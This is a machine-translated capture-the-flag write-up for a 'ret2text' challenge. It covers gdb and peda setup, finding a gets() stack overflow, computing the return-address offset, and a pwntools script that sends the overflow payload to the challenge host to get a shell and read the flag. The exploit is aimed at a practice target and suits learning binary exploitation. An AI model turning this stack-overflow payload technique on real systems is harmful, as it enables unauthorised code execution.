One 、 Topic test site

gdb  Basic use of 

 Understanding of function call stack 

pwntools  Basic usage of tools 

Two 、 The problem solving process

1. Configure the basic environment

 install gdb： adopt apt-get install build-essential Install the basic build environment , Will bring in gdb

 install peda： This is a python Program , Yes gdb Enhanced functionality , For example, it brings  checksec  Program ,
 Used to check file information 

2. see file

Download Title Attachment , It's a zip Compressed package , Check the basic information after decompression ：

All safety measures CANARY/FORTIFY/NX/PIE It's all closed , Explain that the problem does not need complex bypass operation . Next , Drop the file in IDA in , Have a look first main Function source code ：

Just simple input and output , Did not see with flag Relevant information . Continue to look at , There's another one secure function

Called in the function system(‘/bin/sh’)

So guess to get flag It's through execution system get shell, Then execute the order .

Train of thought

Train of thought -1

from IDA It can be seen that ,pwn The program has only these two user functions , The rest are library functions . So the answer lies in these two functions . Stop and think about what we know ：

main  The function is called  gets(), And the length is not limited , There is a stack overflow , It is the entrance to solving problems 

secure  The function is called  system('bin/sh'), It is the exit to solve problems 

Train of thought -2

local variable s Yes, users can use gets() Input , As long as it reaches a certain length L, You can overwrite the Yellow return address .

Let return to address , That is to say EIP Point to system(‘/bin/sh’) The memory address corresponding to the statement can be obtained shell

Regarding this , Two key values need to be obtained ：

 Length of data to be filled L：  We need to cover it  EBP

system('/bin/sh')  Memory address of the calling statement 

Through dynamic debugging , You can get the above data . The specific steps are as follows ：

First step ： Using disassembly , Check the position of the variable , by [rbp-0x70]. Because it is 64 Bit system , We need to cover it ebp, Will be +8 byte . therefore L = 0x70 + 8

The second step ： Still use disassembly , Get system Address of function . Due to the complete call , So take lea Command location ：0x00000000004007b8, That is to say 0x4007b8

After getting two key values , You can write and use code .

Code ：

from pwn import *

host = 'challenge-ad62e4d28ecb18f6.sandbox.ctfhub.com'
port = 30077

p = process("./ret2text")
p = connect(host, port)
payload = bytes('A',encoding="utf8") * 0x78 + p64(0x4007b8)# Different types cannot be spliced 
p.sendline(payload)
p.interactive()

cat flag